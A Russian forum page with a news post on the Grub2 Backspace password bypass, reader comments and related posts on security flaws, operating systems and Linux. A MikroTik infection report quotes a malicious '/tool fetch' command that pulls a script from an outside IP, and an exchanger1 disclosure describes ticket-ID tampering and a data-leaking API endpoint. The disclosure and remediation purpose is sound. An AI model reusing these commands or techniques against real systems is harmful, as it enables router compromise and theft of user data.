-2

Уязвимость Linux

Исследователи по безопасности обнаружили необычную уязвимость в Linux-загрузчике Grub2. Она позволяет войти в аварийную консоль загрузчика, просто 28 раз нажав на клавишу Backspace.

28 нажатий на Backspace Войти в аварийную консоль Linux-загрузчика Grub2, минуя ввод пароля, можно просто нажав 28 раз подряд клавишу Backspace. Такую необычную находку обнаружили исследователи Гектор Марко (Hector Marco) и Исмаэль Риполл (Ismael Ripoll) из Политехнического университета Валенсии в Испании, сообщает Motherboard. Grub2 служит для загрузки ядра операционной системы и используется в большинстве дистрибутивов Linux, включая Ubuntu. По словам Марко, «количество уязвимых систем не поддается подсчету». Затронутые версии Ubuntu Брешь затрагивает все поддерживаемые дистрибутивы Ubuntu, в том числе Ubuntu 15.10, Ubuntu 15.04, Ubuntu 14.04 LTS и Ubuntu 12.04 LTS, а также производные, сообщили в компании Canonical, занимающейся разработкой Ubuntu.


При этом уязвимость содержится в версиях Grub2 начиная с 1.98 (дата выхода — декабрь 2009 г.) и заканчивая 2.02 (дата выхода — декабрь 2015 г). 

Исследователи обнаружили необычную уязвимость в Grub2 Canonical опубликовала на своем сайте инструкцию, как исправить данную ошибку. Уязвимости был присвоен номер CVE-2015-8370.


Источник http://cnews.ru

Дубликаты не найдены

+6

В соответствии с политикой линукса: если у злоумышленника имеется доступ к вашем компу - у вас в любом случае проблемы, ибо пароль учетной записи в любом случае не спасет. Именно поэтому рутовый пароль на линухе меняется одним пинком в нужное место в принципе. Так что уязвимостью это назвать довольно сложно.

раскрыть ветку 1
0

не разбивай сердце виндузятным школохацкерам

+2

На Хабре новость была. Нужен физический доступ к клавиатуре, что бы воспользоваться этой уязвимостью.

0
Комментарий удален. Причина: данный аккаунт был удалён
0

Толку то.. чтобы нажать 28 раз бекспейс надо быть физически рядом с компом. А если ты и так рядом с компом, то ничего не мешает забрать хард и снять копию файлов

раскрыть ветку 5
+3
Та же убунта позволяет шифровать данные, при установке только галочку поставить - так что от такого харда будет мало пользы.
раскрыть ветку 4
0
Ага, но та же убунта шифрует только хомяка. Часто на серверах в хомяке валяется что-то критичное и важное?

Сейчас прошелся по своим сервакам. В хомяках лежат всякие тестовые скрипты, да временные файлы, которые забыл удалить или не используются в проде.

раскрыть ветку 3
Похожие посты
937

Найден новый способ взлома кредитных карт VISA с обходом PIN-кода

Коллектив исследователей-хакеров, работающий в сфере безопасности, обнаружил уязвимость в платёжной системе кредитных карт VISA. Найденная уязвимость позволяет злоумышленнику, вооружённому двумя смартфонами с чипами NFC и некоторым специальным программным обеспечением, обходить защитный механизм запроса PIN-кода подтверждения проведения платежа.

Найден новый способ взлома кредитных карт VISA с обходом PIN-кода Банк, Банкомат, Банковская карта, Visa, Хакеры, Взлом, Overclockers, Информационная безопасность, Уязвимость, Смартфон, Видео

Что это значит простыми словами? У каждой кредитной или дебетовой карты VISA есть настройка (параметр), хранящий пороговый размер денежной суммы, позволяющий проводить платёж без ввода пароля (PIN кода). Например, если задать порог как 100 рублей и купить мандаринку за 10 рублей, то платёжный терминал магазина не будет запрашивать у вас PIN код при оплате. Но если купить торт за 500 рублей, то терминал на кассе запросит у вас пароль (PIN код). Хакеры смогли найти лазейку, позволяющую обойти защитный механизм и проводить все платежи без запроса PIN кода. Да-да! Они могут бесконтактным способом, то есть по воздуху, снять любую сумму с карты VISA без запроса пароля PIN. Представляете масштаб бедствия?

С технической точки зрения процесс взлома выглядит следующим образом. Один из смартфонов с NFC коммуникацией выполняет роль эмулятора платёжного терминала, современные смартфоны имеют такой функционал. Кредитная карта должна быть поднесена к этому эмулятору терминала. В момент проведения платежа эмулятор запрашивает у карты разрешение на совершение операции. Далее эмулятор терминала получает разрешение от карты, и в это же время второй смартфон, использующий специальное программное обеспечение, совершает подмену параметров транзакции, блокируя запрос карты на ввод пароля PIN. Всё, что нужно сделать дальше, - поднести смартфон с привязанной картой к реальному терминалу продавца и оплатить покупку без какого-либо запроса PIN-кода. Процесс занимает считанные секунды и отображён на видеозаписи.


Советуем без лишней надобности не доставать кредитные карты VISA из вашей шапочки из фольги. Всем удачи и добра!

McArcher

via

Показать полностью
283

7 операционных систем – неудачниц

Обычно о них говорят, как о худших. Но это совсем неправильно. Системы по разным причинам не были приняты публикой. И вместо желанного успеха их ждал провал.

Операционной системе под силу полностью поменять ваши впечатления от использования компьютера, доставить радость или огорчение. И никакой мощью процессора этого не заменишь.

7 операционных систем – неудачниц Операционная система, Длиннопост, Microsoft, Linux, IT, Яндекс Дзен

Причины провала


Случается так, что технологии приходят не в свое время. Зачастую удивительные технологии. Такие, которые могли бы ускорить прогресс на десятилетия. Но аудитории они оказываются неинтересны и помнят о них лишь немногие энтузиасты.

Подобные технологии больше не развивают и они остаются в истории как сбойные. Порой все не так грустно. И причины лежат скорее в сфере психологии, чем технологий.


Lindows (2001)


Издавна линуксоиды стремятся привлечь пользователей Windows к открытому ПО. Методы разные. От грубой критики до тонких намеков. Провальная версия Millenium дала отличный шанс. Разработчики Lindows в 2001 году создали систему с интерфейсом сильно похожим на Windows. В основе — Линукс и открытый код.

Увы, софт или попросту не работал или тупил и глючил. Да и Майкрософт была не в восторге от названия ОС. В итоге систему переименовали в Linspire.

7 операционных систем – неудачниц Операционная система, Длиннопост, Microsoft, Linux, IT, Яндекс Дзен

Windows Millenium (2000)


Тот случай, когда маркетинг не сработал. Все так ждали 2000 года. В названиях продуктов стремились использовать это число или слово «Миллениум». Преемница Windows 98, по впечатлениям многих пользователей, постоянно показывала BSOD. Установка софта и опция восстановления системы также не радовали стабильностью. Отмечалось, что система порой восстанавливала ранее удаленные вирусы. Всего через год началась эпоха Windows XP. Не исключено, что систему просто постигла судьба переходных технологий и она не была столь плоха, как принято считать.

7 операционных систем – неудачниц Операционная система, Длиннопост, Microsoft, Linux, IT, Яндекс Дзен

Corel Linux (1999)


Corel надеялась потеснить Майкрософт, но из этого ничего не получилось. Графический установщик в большинстве случаев зависал. Система могла просто «исчезнуть» после установки. Драйвера искались настолько плохо, что пользователям зачастую был недоступен интернет. ОС начали совершенствовать, но публикой уже были сделаны выводы.

7 операционных систем – неудачниц Операционная система, Длиннопост, Microsoft, Linux, IT, Яндекс Дзен

Windows Vista (2007)


Висту считают самой провальной системой софтверного гиганта. Ее создавали, как преемницу всеобщей любимицы Windows XP. Система не плоха, а слишком требовательна к железу (для своего времени). Выбор у пользователей состоял в приобретении нового компа, затратной модернизации старого или возвращении к привычной версии. Нетрудно догадаться, что предпочло большинство. С выходом обновлений ситуация улучшилась, но аудитория уже сделала свой выбор.

7 операционных систем – неудачниц Операционная система, Длиннопост, Microsoft, Linux, IT, Яндекс Дзен

MS-DOS 4.0 (1988)


Если в восьмидесятые у вас был компьютер, скорее всего он работал под управлением MS-DOS. В четвертую версию попытались встроить графический интерфейс. Поддерживалась и мышь. Но работала система с ошибками, сбои возникали постоянно. Опытные пользователи предпочли вернуться на версию 3.3.

7 операционных систем – неудачниц Операционная система, Длиннопост, Microsoft, Linux, IT, Яндекс Дзен

Windows 8 (2012)


Хорошая попытка создать универсальную операционную систему. Возможно даже единственная в своем роде. Но, к сожалению или счастью, безуспешная. Предполагалось, что «восьмерка» станет запускаться на ноутах, смартфонах и планшетах. Увы, большая часть программ не могла похвастаться кроссплатформенностью. Похоже, что делалась в спешке, в качестве «ответа Андроиду и iOS». Разочаровала публику, которая поспешила вернуться на «семерку» и забыть о неудачном эксперименте.

7 операционных систем – неудачниц Операционная система, Длиннопост, Microsoft, Linux, IT, Яндекс Дзен

JavaOS (1996)


Sun Microsystems пожелала создать систему, написанную преимущественно на Java. В этом проявлялось отличие от Windows, платформы Mac и юниксподобных ОС, в основе которых лежит язык программирования C. Успеха платформа не снискала, несмотря на поддержку IBM. Это и неудивительно, система работала медленно, притормаживала, а многозадачность отсутствовала.

7 операционных систем – неудачниц Операционная система, Длиннопост, Microsoft, Linux, IT, Яндекс Дзен

Источник Блог системного администратора

Показать полностью 7
99

Linux для тебя

Linux для тебя Linux, Windows, Программное обеспечение, Операционная система, Ноутбук, ПК, Android, Длиннопост

Дисклеймер: Я никого не призываю переходить на другую операционную систему(ОС), а просто хочу показать, что существуют альтернативные ОС. Выбор всегда за вами.


Начну, пожалуй с истории. Все началось с UNIX систем, которые в конце 60-x годов были разработаны сотрудники компании Bell Labs. Они мало чем были похожи на современные ОС, просто терминал и компилятор под ассемблер. Компания AT&T, которой принадлежала Bell Labs понимала коммерческую ценность UNIX, но из-за запрета наложенного правительством США, компания могла заниматься только телефонными сетями и смежным оборудованием. Для того, чтобы обойти запрет, компания передала исходный код ОС некоторым высшим учебным заведениям. Одним из первых исходный код получил университет Беркли.

В университете Беркли начинается история семейства Berkeley Software Distribution (BSD) систем, которые считаются UNIX подобными ОС. Со временем большая часть кода была переписана сотрудниками университета, что в дальнейшем позволило отделится от AT&T. Про BSD системы обычный пользователь ничего не знает т.к. они не смогли получить большой популярности у обычных пользователей, об этом чуть позже. Но в тоже время компания Apple использовала большую часть кода FreeBSD для создания MacOS, Sony и Nintendo использовали ее для своих приставок, сервера WhatsApp и Netflix тоже работают под управлением ОС семейства BSD. Парадокс - непопулярная ОС используется в популярных продуктах.


В 1991 году Линус Торвальдс студент Хельсинского университета, начал написание ядра Linux. Когда он выложил исходный код, другие разработчики заинтересовались и стали помогать в разработке ядра.

Так почему более зрелая и мощная система BSD не сыскала популярности в open source сообществе в отличии от Linux? Все дело в лицензии под которой распространяется ОС. Лицензия BSD позволяет использовать ее код, а затем сделать его закрытым, так в свое время поступила Apple. С Linux так сделать нельзя, лицензия обязывает после изменения кода выложить его в открытый доступ, поэтому сообществу выгодно писать программное обеспечение (ПО) под лицензией Linux.

Linux для тебя Linux, Windows, Программное обеспечение, Операционная система, Ноутбук, ПК, Android, Длиннопост

С того момента было создано огромное количество дистрибутивов на основе ядра Linux. Коммерческие организации также участвуют в разработке ядра и поддерживают open source сообщество.


Дерево Linux дистрибутивов(в высоком разрешении)

Linux для тебя Linux, Windows, Программное обеспечение, Операционная система, Ноутбук, ПК, Android, Длиннопост

Если посмотреть статистику использования ОС в сегменте персональных компьютеров, около 77% это Windows, 16% это MacOS и какие-то 2% Linux. Дело в том, что Windows и MacOS коммерческие ОС, которые продвигались на рынке ПК, когда Linux использовалась в основном для серверов и маршрутизаторов. На самом деле Linux работает в большем количестве устройств, чем может показаться на первый взгляд: маршрутизаторы, умная техника, смартфоны(Android основан на ядре Linux), супер компьютеры, сервера. Каждый день мы косвенно используем Linux. Ошибочно мнение, что Windows популярная ОС, исторически так сложилось, что большое количество ПО было написано под нее, дает о себе знать и сарафанное радио. Подавляющее большинство с детства пользуется ПК под управлением Windows и когда человек приобретает новый ПК или ноутбук, как правило с предустановленной Windows или устанавливает ее сам - дело привычки.


Теперь хочу рассказать как я познакомился с миром Linux. До университета я был обычным пользователем Windows и только слышал о существовании Linux. Когда мне пришлось по надобности столкнуться с этой ОС, а я ничего особо не знал, то я поставил самый популярный дистрибутив Ubuntu и пользовался им около недели. Он мне не понравился и я стал пробовать другие дистрибутивы. Дольше всего я использовал Fedora от Red Hat и Elementary OS. Сейчас использую Manjaro с рабочим окружением KDE, вообще рабочие окружения это отдельная тема. Существует огромное количество дистрибутивов и такое многообразие может отпугнуть неподготовленного пользователя.


Fedora с окружением Gnome
Linux для тебя Linux, Windows, Программное обеспечение, Операционная система, Ноутбук, ПК, Android, Длиннопост

elementary OS

Linux для тебя Linux, Windows, Программное обеспечение, Операционная система, Ноутбук, ПК, Android, Длиннопост

Manjaro с окружением KDE Plasma 5

Linux для тебя Linux, Windows, Программное обеспечение, Операционная система, Ноутбук, ПК, Android, Длиннопост

В основном, когда человек задумывается о переходе на новую ОС, его останавливает мысль об отсутствии привычных программ. Я провел небольшой опрос среди своих друзей и знакомых, чем они пользуются ежедневно для решения своих задач.

Linux для тебя Linux, Windows, Программное обеспечение, Операционная система, Ноутбук, ПК, Android, Длиннопост

В опросе участвовало 25 человек. Для большинства людей необходим браузер, офисный пакет, мессенджер и графический редактор. Большая часть ПО нативно есть под Linux, а остальная имеет достойные альтернативы. Например, пакет MS Office я заменил на Google Docs и Open Office, они прекрасно справляются со своими задачами и имеют обратную совместимость с MS Office. Для работы с фото Krita и Gimp, для видео DaVinci Resolve и Kdenlive, LMMS и Audacity использую для работы с аудио. Дефицита программ нет и они бесплатные.


Установил нескольким друзьям и девушке, пока всем всё нравится

Linux для тебя Linux, Windows, Программное обеспечение, Операционная система, Ноутбук, ПК, Android, Длиннопост

В СНГ пользователи персональных ПК не пользуются лицензионным софтом. Все привыкли пиратить все, что можно. За свою жизнь не встречал тех, кто имеет подписку Adobe или MS Office, кроме бизнес сегмента. В СНГ пиратство не наказуемо для пользователя ПК. Но кроме моральных терзаний, есть еще один момент, задумывались ли вы, какая выгода человеку, который взламывает ПО и отдает его в массы, это хорошая пища для размышления.


Что в итоге? Linux дает безопасность, стабильность, полный контроль над ОС и бесплатное ПО. Тем более попробовать Linux всегда можно не отказываясь от Windows - поставить на виртуальную машину или как вторую систему и в дальнейшем снести винду полностью перейти на Linux.

Показать полностью 7
804

Google планирует перевести Android на стандартное ядро Linux

Мобильная операционная система Android использует специальную версию ядра Linux, которая подверглась ряду изменений со стороны производителей железа для смартфонов. Но вскоре ситуация может измениться: по заявлению представителей Google, компания планирует минимизировать разницу между Linux и Android, сделав популярную ОС ещё более универсальной.

Google планирует перевести Android на стандартное ядро Linux Операционная система, Google, Android, Linux, Длиннопост

Динамика изменений ядра Linux


На конференции Linux Plumbers разработчики Google сообщили, что компания заинтересована в максимальном приближении Android к ядру Linux. Это позволит решить ряд технических проблем, отказавшись от тысяч программных изменений в каждой новой прошивке. Кроме того, компания сможет отказаться от поддержки фиксированных версий ядра Linux в течение шести лет, как это реализовано сейчас.


Переход на ядро ARM Linux, по словам разработчиков, станет выигрышным и для рядового пользователя, поскольку положительно скажется на производительности и автономности устройств. Сейчас Google работает над объединением как можно большего числа модификаций Android в основное ядро Linux. По состоянию на февраль 2018 года ядро Android имело около 32 000 дополнений и 1,5 тысячи удалённых фрагментов сравнительно с оригинальным Linux 4.14.0.

Google планирует перевести Android на стандартное ядро Linux Операционная система, Google, Android, Linux, Длиннопост

В ходе конференции был продемонстрирован смартфон Xiaomi Pocophone, работающий под управлением Android 10, построенной на базе основного ядра Linux. Идея Google заключается в создании универсального интерфейса, который позволял бы активировать аппаратные элементы устройства в виде подключаемых модулей с установкой необходимых драйверов. При этом вносить изменения в само ядро ОС не потребуется.


Сроки реализации проекта по переходу на «десктопное» ядро операционной системы корпорация пока не объявила.



Источник 4da


Источник androidpolice

Показать полностью 1
1121

В SIM-картах найдена самая опасная уязвимость за историю мобильных сетей.

Специалисты в области кибербезопасности обнаружили критическую уязвимость в SIM-картах, позволяющую с помощью SMS взломать практически любой смартфон и следить за его владельцем. В зоне риска находятся обладатели устройств от Apple, ZTE, Motorola, Samsung, Google, HUAWEI и других компаний. Эксперты говорят, что это самый изощрённый тип атаки, из когда-либо существовавших в мобильных сетях.

В SIM-картах найдена самая опасная уязвимость за историю мобильных сетей. Сим-Карта, Уязвимость, Смартфон, Хакеры, Взлом, Информация, Анонимность, 4pda, Длиннопост

Уязвимость, получившая название SimJacker, находится в программном обеспечении SIMalliance Toolbox Browser (S@T Browser), встроенном в большинство SIM-карт, которые используются мобильными операторами как минимум в 30 странах мира. Злоумышленники могут прибегнуть к ней независимо от марки устройства жертвы. По словам специалистов, этот эксплойт успешно используется хакерами последние несколько лет. Они зафиксировали реальные атаки на устройства практически всех производителей, включая Apple, Samsung, Google, HUAWEI и других. Взлому подвержены даже гаджеты интернета вещей с SIM-картами.

S@T Browser представляет собой приложение, которое устанавливается на SIM-карты, в том числе и на eSIM, как часть SIM Tool Kit (STK), и предназначено для того, чтобы мобильные операторы могли предоставлять своим клиентам разные базовые услуги. S@T Browser содержит ряд инструкций STK, таких как отправка сообщений, настройка звонков, запуск браузера, предоставление локальных данных, запуск по команде и отправка настроек, которые могут быть активированы сообщением.

Используя GSM-модем за 10 долларов, злоумышленники могут отправить на аппарат жертвы поддельное сообщение, содержащее вредоносный код. Это позволяет им:


• Получить местоположение целевого устройства и его IMEI

• Распространять любую информацию путём отправки поддельных сообщений от имени жертв

• Совершать звонки на платные номера

• Шпионить, приказав устройству позвонить по номеру телефона злоумышленника

• Загружать вредоносные программы, заставляя браузер устройства открывать вредоносные веб-страницы

• Отключать SIM-карту

• Получать информацию о языке на устройстве, заряде аккумулятора и т. д.

В SIM-картах найдена самая опасная уязвимость за историю мобильных сетей. Сим-Карта, Уязвимость, Смартфон, Хакеры, Взлом, Информация, Анонимность, 4pda, Длиннопост

Во время атаки пользователь совершенно ничего не подозревает. Отличием SimJacker от других способов получения информации о местонахождении жертвы заключается в возможности выполнения действий, указанных выше. Эта атака также уникальна тем, что её не может определить антивирусное ПО, поскольку она содержит ряд инструкций, которые SIM-карта должна выполнять.

Все технические подробности этой уязвимости будут опубликованы в октябре этого года. По словам исследователей, одной из главных причин её существования сегодня — использование устаревших технологий в SIM-картах, спецификации которых не обновлялись с 2009 года. Специалисты уже сообщили о своём открытии в Ассоциацию GSM.
Источник: http://4pda.ru/2019/09/14/361610

Показать полностью 1
526

Уязвимости MikroTik

К сожалению скриншотов не будет. Будет сухой текст.

23 апреля 2018 года обнаружена уязвимость всех продуктов микротик на RouterOS.

Причем уязвимость позволяет узнать логин и  пароль, беспрепятственно войти в систему и сделать с роутером всё что угодно.

Всё бы было настолько буднично если бы 24 июля я не обнаружил бы на своем роутере и роутерах компании эту заразу. Распространяется очень быстро.

Характерные приметы: В System - scripts появляются посторонние скрипты, вот один из них:

/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http

В файлах соответственно mikrotik.php

Отключаются все запрещающие правила фаервола.

Создаются задачи в планировщике по запуску скрипта.

Открывается сокс-прокси на нестандартном порту.

Меняются адреса днс-серверов.

Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака.


Самый оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа.

Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации.

Ну пару советов по безопасности:

IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные.

Грамотно настроить фаерволл.

В случае если факт взлома был зафиксирован - сменить пароль на микротик.


Подробнее здесь https://forum.mikrotik.com/viewtopic.php?t=133533

272

PS4 Взломана версия 5.05

Хакер под ником Spectre выпустил исходный код программы взлома PlayStation 4 с прошивкой версии 5.05. Об этом он заявил в Twitter.


Отмечается, что взлом полностью открывает доступ к файловой системе консоли. Также он позволит запускать на ней сторонние приложения, вроде эмуляторов консолей прошлого поколения. Это также позволяет обойти антипиратскую защиту и запускать пиратские игры.


Взлом основан на уязвимости ядра системы, найденной хакером Qwertyoruiopz.

На данный момент актуальная версия ОС PS4 — 5.55.


В Сети уже можно найти несколько реализаций взлома и получения образа игры с диска. Судя по комментариям, не все из них работают должным образом, но положительный результат наблюдается часто.


В январе этого года хакеры заявили об успешном взломе PS4 с прошивкой версии 4.05, а также смогли запустить удаленную из магазина Sony игру P.T. Также на взломанной приставке удалось запустить Horizon: Zero Dawn, которая требует более поздней версии системы. До этого взломать удавалось лишь PS4 с версией 1.76.


https://kanobu.ru/news/hakeryi-vzlomali-ps4-sproshivkoj-505-...

https://lenta.ru/news/2018/05/28/ps4/

PS4 Взломана версия 5.05 Playstation, Playstation 4, Взлом, Хакеры, Уязвимость, Пиратство
4379

Про взлом сайта

Вспомнил историю, хочу поделиться. Может кому то интересно, что значит "взлом сайта" и как это делают.

Был у меня малюсенький сайт в годах примерно 2010-2014. Сайт - интернет магазин, где я продавал свои же php скрипты и давал возможность любому продавать на нём свои скрипты и брал за это 10%. Сайт был не прибыльным, но и содержание его мне ни чего не стоило. И написал я его полностью сам, совершенствуя навык программирования. Был этот сайт полностью автоматизирован.. Т.е. пополнение баланса через webmoney, покупка, продажа, вывод денег, оповещения о продажах по смс... Всё проходило автоматически и без моего участия. К сайту был привязан кошелек, на котором лежало около 3000р.

Однажды мне позвонил какой-то паренек.. 17 лет ему было. И представился как человек, взломавший мой сайт.

И действительно, парень вывел на свой кошелек все деньги с кошелька сайта. Он их мне вернул и рассказал про уязвимость.

А уязвимость просто наитупейшая... Немного об алгоритме программы: при покупке какого-то товара, программа проверяла, если на счету покупателя денег больше чем цена товара, то из его счета вычиталась эта сумма и отдавался товар. Так вот. В программе при добавлении товара на сайт я не сделал проверку на отрицательную цену. Чувак просто добавил товар с отрицательной ценой, допустим -500р. Потом с другого аккаунта стал покупать свой же товар. Программа проверила, что на его нулевом счету денег больше, чем -500 и вычла из нуля минус пятьсот... Минус на минус дало плюс и его счет увеличился на 500р при покупке товара. Потом он заказал вывод средств и программа в автоматическом режиме перевела деньги на его кошелек.

К тому времени я уже забросил этот сайт.. Больше года им не занимался, и решил просто отдать его тому парню... Он согласился, но видимо ему сайт быстро надоел и уже через пару месяцев он перестал существовать.

108

Уязвимость exchanger1

Уязвимость exchanger1 Уязвимость, Web, Хакеры, Взлом, Xss, Injection, Exchanger1, Безопасность, Длиннопост

В этой статье, я опишу весьма интересную с точки зрения логики находку.

Я дал людям на фикс 30 дней. Увы, благодарить администрация не умеет )


Часть 1



Я говорю о безопасности пользователей в общем.


Часть полученного вознаграждения я вывел используя ваш обменник.


Мне стало забавно почитать о вашем проекте подробнее и я наткнулся на "https://exchanger1.com/page/about" .


Пункт 4 вкладки "Безопасность работы с нами", говорит нам о защите любых данных пользователей. (Все это гарантирует сохранность любых данных пользователей на нашем сайте.)



Весьма громкое заявление !


Учитывая все факторы, я обнаружил весьма серьезную уязвимость в системе помощи пользователям.


Злоумышленник может получать доступ к тикетам и писать в них от имени администрации!


также можно просто закрыть тикет.


Неправильное разграничение привилегий может нести за собой большие последствия...



Часть 2



В результате исследования модуля помощи клиентам, также была найдена уязвимость в реализации api.


Злоумышленник может Деанонимизировать транзакции пользователя.


Рабочий пример:


Я перебрал транзакции пользователей по номеру тикета.


https://pix.my/o/8a9Tvk?1513363007


Получился достаточно большой результат.


транзакция на обмен 300$ пренадлежит автору тикета N-320014. (


23:00 21.11.2017 )


По номеру тикета, api выдает нам информацию кодированную в Unicode.


Полученная транзакция в свою очередь содержит суммы переводов.



Пример расшифровки ответа api на транзакцию 320014:



{"error":false,"_content":{"#trx-status":"<h5>


<small>Статус:</small> Завершена</h5>


<div class="description">


<a href="/exchange/status/8661199">Заявка № 8 661 199</a>


</div>


<div class="exchange-error">


<div class="money-error">


<span class="first-currency">300,00</span>



<div class="image-wrapper">


<img class="currency_logo"


src="/bundles/x2face/images/currency/advcash.png"


height="27" width="27" alt="#">


</div>


<span class="money">USD</span>


</div>


<div class="money-error">


<span class="second-currency">7 800,00</span>



<div class="image-wrapper">


<img class="currency_logo"


src="/bundles/x2face/images/currency/visamaster.png"


height="24" width="24" alt="#">


</div>


<span class="money">UAH</span>


</div>


</div>


<div class="time-money">


<a class="btn small status" href="#" data-exec="jQuery(this).closest('form').trigger('submit');">Проверить статус</a>


</div>exchanger_pm"}}



Техническая и детальная информация:



1) для получения доступа к чужому тикету, злоумышленнику достаточно заменить идентификатор.


Злоумышленник может от имени администрации попросить пользователя выслать ту или иную информацию.



2) для получения транзакции по id тикета, злоумышленику достаточно совершить GET запрос на:


https://exchanger1.com/profile/tickets/history/{$ID}/status


позже декодировать полученную информацию.



Простой вектор атаки:


найти транзакцию и получить ее сумму.(используя баг в api)


Располагая этой информацией, попросить пользователя подтвердить свои документы.



Статистика:


Перебрав диапазон в 160 тикетов, я получил доступ к 31 транзакции.

Показать полностью
149

Тесты заплатки для CPU Intel: производительность в играх не затронута

Источник 3DNews


В настоящее время в СМИ распространяется информация о не опубликованной ещё в полной мере уязвимости процессоров Intel, которая требует программной заплатки на уровне ядра всех популярных ОС и в теории может привести к значительному снижению производительности в самых разных задачах. Каковы же потенциальные потери от внедрения исправлений, получивших общее имя KPTI [Kernel Page Table Isolation]?

Ресурс Phoronix, освещающий связанные с развитием дистрибутивов Linux темы, решил провести ранние тесты различных задач на двух системах с ядром Linux 4.15-rc6, главным новшеством которого являются KPTI-заплатки. Уровень падения производительности ожидается в диапазоне от одной до двух цифр — в зависимости от того, как часто задача или приложение взаимодействует с изолированным в отдельной области адресного пространства ядром операционной системы. Если это простые пользовательские приложения, KTPI-обновления не должны сильно повлиять, особенно на более новых процессорах Intel с поддержкой функции PCID (Process Context Identifiers — идентификаторы контекста процесса, используемые процессором для определения закешированной информации, относящейся к различным адресным пространствам).

Тестированию в синтетических пакетах подверглись две системы: на базе Core i7 8700K Coffee Lake с Ubuntu 16.04.3 LTS и Core i7 6800K Broadwell E с Ubuntu 17.10. Компоненты тоже отличались, так что корректнее сравнивать результаты отдельного процессора с активированной заплаткой и без неё.

Например, бенчмарк файловой системы FS-Mark демонстрирует замедление на последнем ядре с Linux при активации KPTI. На системе с высокоскоростным накопителем Samsung 950 PRO NVMe SSD и i7-8700K провал оказывается чудовищным — почти двукратным. В то время как результаты системы с i7-6800K и обычным SSD Toshiba TR150 с интерфейсом SATA 3.0 проседают куда скромнее.

Тесты заплатки для CPU Intel: производительность в играх не затронута Intel, Процессор, Тест, Производительность, Информационная безопасность, Linux, Уязвимость, 3dnews, Длиннопост
Производительность обеих систем в тесте Compile Bench тоже пострадала. Если это не вызвано x86-заплатками, то в свежее ядро должны были быть внесены другие существенные регрессивные изменения (что весьма сомнительно).
Тесты заплатки для CPU Intel: производительность в играх не затронута Intel, Процессор, Тест, Производительность, Информационная безопасность, Linux, Уязвимость, 3dnews, Длиннопост

Работа открытой объектно-реляционной системы управления базами данных PostgreSQL стала тоже заметно медленнее:

Тесты заплатки для CPU Intel: производительность в играх не затронута Intel, Процессор, Тест, Производительность, Информационная безопасность, Linux, Уязвимость, 3dnews, Длиннопост
Аналогичная ситуация с замедлением наблюдается и в работе открытого сетевого журналируемого хранилища данных Redis на базе нереляционной высокопроизводительной СУБД:
Тесты заплатки для CPU Intel: производительность в играх не затронута Intel, Процессор, Тест, Производительность, Информационная безопасность, Linux, Уязвимость, 3dnews, Длиннопост
В то же время скорость работы приложений, ограниченных при работе преимущественно активностью в области пользовательского пространства, будет затронута, по-видимому, минимально, если судить по тестам кодирования видео в формат H.264, задаче компиляции и декодирования видео через FFmpeg:
Тесты заплатки для CPU Intel: производительность в играх не затронута Intel, Процессор, Тест, Производительность, Информационная безопасность, Linux, Уязвимость, 3dnews, Длиннопост
Аналогичная ситуация касается и игровых задач. Судя по ранним тестам, их проблема почти не коснётся. По крайней мере, с переходом на новое ядро в Linux с заплаткам KPTI падение производительности не выходит за рамки статистической погрешности. На системе с Radeon RX Vega 64 и Intel Core i7 8700K Coffee Lake наблюдается следующая ситуация (верхняя полоска — до заплатки, нижняя — после):
Тесты заплатки для CPU Intel: производительность в играх не затронута Intel, Процессор, Тест, Производительность, Информационная безопасность, Linux, Уязвимость, 3dnews, Длиннопост

Таким образом, в самых разных играх для Linux, использующих API Vulkan и OpenGL, не наблюдается сколько-нибудь заметного падения частоты кадров в результате использования ядра с обходом уязвимости чипов Intel. Как и в случае с рядом других пользовательских приложений вроде FFmpeg. В то же время ряд синтетических тестовых пакетов или специфические задачи вроде СУБД страдают порой весьма серьёзно. Похоже, рядовым пользователям беспокоиться особенно не о чем, тогда как владельцев облачных серверов на базе чипов Intel проблема, возможно, серьёзно затронет.

Между тем AMD в лице Томаса Лендаки (Thomas Lendacky) официально подтвердила, что её чипы не подвержены уязвимости: «Процессоры AMD не являются объектом тех типов атак, против которых направлены меры защиты KTPI. Микроархитектура AMD не разрешает ссылки на ячейки памяти, в том числе спекулятивные, которые дают доступ к высокопривилегированным данным в менее привилегированном режиме, когда такой доступ может приводить к ошибке страницы. Поэтому следует по стандарту отключать KPTI на процессорах AMD». Обсуждение новости уже привело к падению курса акций Intel и росту AMD.

Тесты заплатки для CPU Intel: производительность в играх не затронута Intel, Процессор, Тест, Производительность, Информационная безопасность, Linux, Уязвимость, 3dnews, Длиннопост
Показать полностью 7
380

Google развивает открытую замену прошивкам UEFI

Рональд Минних (Ronald Minnich), основатель проекта CoreBoot, выступил на конференции LinuxCon с докладом, в котором рассказал о развиваемом компанией Google открытом проекте NERF (Non-Extensible Reduced Firmware). В рамках NERF предпринята попытка разработки прозрачной и открытой замены прошивкам UEFI, в основе которой использовано ядро Linux и урезанное программное окружение. Конечной целью является предоставление средств для замены или отключения всех прослоек, выполняемых вне основной операционной системы, и блокирование любой связанной с UEFI, SMM и Intel ME фоновой активности.


NERF также рассчитан на снижение векторов возможных атак, расширение возможностей по контролю за активностью прошивок, исключение излишней функциональности (например, TCP-стек и web-сервер), удаление встроенных механизмов обновления в пользу обновления из базового Linux-окружения. В состав NERF входит избавленный от блобов упрощённый вариант прошивки для Intel ME (Management Engine), урезанная прошивка для UEFI, код для отключения SMM, ядро Linux, образ initramfs c системой инициализации и инструментарием u-root, написанными на языке Go.


В прошивке для Intel ME оставлены только компоненты для начальной инициализации CPU, все остальные модули удалены при помощи инструментария me_cleaner (прошивка сокращена с 5 Мб до 300 Кб). Код обработчиков SMM (System Management Mode) также отключен и переведён на обработку прерываний SMI через ядро Linux. Прошивка для UEFI переведена на использование ядра Linux, наработок CoreBoot и инструментария u-root.


